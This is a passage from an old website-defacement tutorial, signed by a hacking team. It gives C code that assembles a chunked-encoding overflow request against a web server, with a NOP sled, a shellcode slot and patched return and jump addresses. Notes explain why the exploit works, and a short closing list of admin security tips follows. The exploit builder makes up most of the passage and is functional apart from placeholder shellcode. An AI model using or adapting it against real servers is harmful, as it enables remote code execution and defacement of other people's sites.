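    return 0;
}

/* Request-target = path + NOP sled + shellcode; body = one 16-byte chunk (pad),
 * two 4-byte chunks (srcdata, jmpaddr) and the last-chunk. Returns length or -1. */
int build_request(unsigned char *out, size_t cap, const char *dest_file, const char *dest_ip,
                  const unsigned char *shellcode, size_t sc_len, const char *pad16,
                  uint32_t srcdata, uint32_t jmpaddr)
{
    unsigned char url[SLED_LEN + 1];
    if (sc_len > SLED_LEN || strlen(pad16) != 16) return -1; /* "10\r\n" promises 16 bytes */
    memset(url, 0x90, SLED_LEN);
    memcpy(url + SLED_LEN - sc_len, shellcode, sc_len);
    url[SLED_LEN] = '\0';
    int n = snprintf((char *)out, cap,
                     "POST %s%s HTTP/1.1\r\nAccept: */*\r\nHost: %s\r\n"
                     "Content-Type: application/x-www-form-urlencoded\r\n"
                     "Transfer-Encoding: chunked\r\n\r\n"
                     "10\r\n%s\r\n4\r\nAAAA\r\n4\r\nBBBB\r\n0\r\n\r\n\r\n",
                     dest_file, (char *)url, dest_ip, pad16);
    if (n < 0 || (size_t)n >= cap) return -1;
    if (patch_marker(out, (size_t)n, "BBBB", jmpaddr) || patch_marker(out, (size_t)n, "AAAA", srcdata))
        return -1;
    return n;
}

/* Decode a chunked body (hex-size CRLF data CRLF ... 0 CRLF); -1 on bad framing. */
int decode_chunked(const unsigned char *body, size_t len, unsigned char *out, size_t cap)
{
    size_t pos = 0, outlen = 0;
    while (pos < len) {
        size_t size = 0, digits = 0;
        while (pos < len && digits < 8 && isxdigit(body[pos])) {
            unsigned char c = body[pos++];
            size = size * 16 + (size_t)(isdigit(c) ? c - '0' : tolower(c) - 'a' + 10);
            digits++;
        }
        if (digits == 0 || len - pos < 2 || body[pos] != '\r' || body[pos + 1] != '\n') return -1;
        pos += 2;
        if (size == 0) return (int)outlen; /* last-chunk */
        if (size > len - pos || len - pos - size < 2 || size > cap - outlen)
            return -1; /* chunk header claims more data than is present, or output is full */
        memcpy(out + outlen, body + pos, size);
        outlen += size;
        pos += size;
        if (body[pos] != '\r' || body[pos + 1] != '\n') return -1;
        pos += 2;
    }
    return -1; /* input ended before the last-chunk */
}

/* Find the end of the header block and decode the chunked body after it. */
int decode_request_body(const unsigned char *req, size_t len, unsigned char *out, size_t cap)
{
    size_t hdr_end = find_bytes(req, len, "\r\n\r\n");
    if (hdr_end == (size_t)-1) return -1;
    hdr_end += 4;
    return decode_chunked(req + hdr_end, len - hdr_end, out, cap);
}

/* Build the demo request; return 24 when the decoded body is exactly
 * pad || srcdata || jmpaddr (both little-endian), otherwise -1. */
int demo_body_layout(void)
{
    static const unsigned char fake_sc[] = { 0xcc, 0xcc, 0xcc, 0xcc }; /* placeholder, not shellcode */
    static const unsigned char expect[] = "PPPPPPPPPPPPPPPP\x04\x03\x02\x01\x0d\x0c\x0b\x0a";
    unsigned char req[1024], body[64];
    int n = build_request(req, sizeof req, "/default.asp", "192.0.2.10", fake_sc, sizeof fake_sc,
                          "PPPPPPPPPPPPPPPP", 0x01020304u, 0x0a0b0c0du);
    if (n < 0) return -1;
    int m = decode_request_body(req, (size_t)n, body, sizeof body);
    return (m == 24 && memcmp(body, expect, 24) == 0) ? m : -1;
}

int main(void)
{
    printf("decoded chunked body: %d bytes\n", demo_body_layout());
    return 0;
}
```

Two details worth noticing: the markers are patched after sprintf because the 32-bit values may contain bytes that would end a C string, and the exploit patches BBBB before AAAA for the same reason (a NUL written into AAAA would stop strstr from finding BBBB). The decoder also shows the server-side failure mode the exploit relies on: a chunk header that promises more bytes than the body carries is rejected here, whereas the vulnerable server trusted it.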

Various Security Measures

Website defacement has become a serious problem for IT (Information Technology) companies. Every day thousands of websites are defaced, and even government websites are defaced for various reasons; the most common is "cyber war": just as rival countries fight wars in the real world, they fight cyber wars in the wired world.

If you want to see a web attack archive, visit the following site:

http://defaced.alldas.org

Now some security measures for system administrators:

- First of all, organize your web root into suitable directories: images in an image directory, server-side scripts in their own directory, and so on. The point of this layout is that each directory can then carry only the permissions it needs: no script or execute permission on directories that hold static content, no write permission for the web server's account on directories that hold scripts, and unused script mappings and sample applications removed. If you don't configure your web root properly, your web server will be open to many attacks.

- Keep up with the latest vulnerabilities; visit these sites:

http://www.securityfocus.com
http://www.packetstorm.org
http://www.guininski.com
http://www.insecure.org
http://www.securiteam.com
http://www.slashdot.org
http://www.technotronic.com

- Every web server has vulnerabilities, but there is no need to panic: download and apply the vendor's patch for each published vulnerability. An exploit like the one above depends on the server still being unpatched.

- Finally, you must be able to predict the moves of a malicious cracker or script kiddie. You need to know how a cracker breaks into your site or web server and the motive behind the attack; think, act and work like a hacker, and root the cracker out.

So this completes my tutorial on defacing websites. I hope you have understood the intricacies of web servers.

Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM
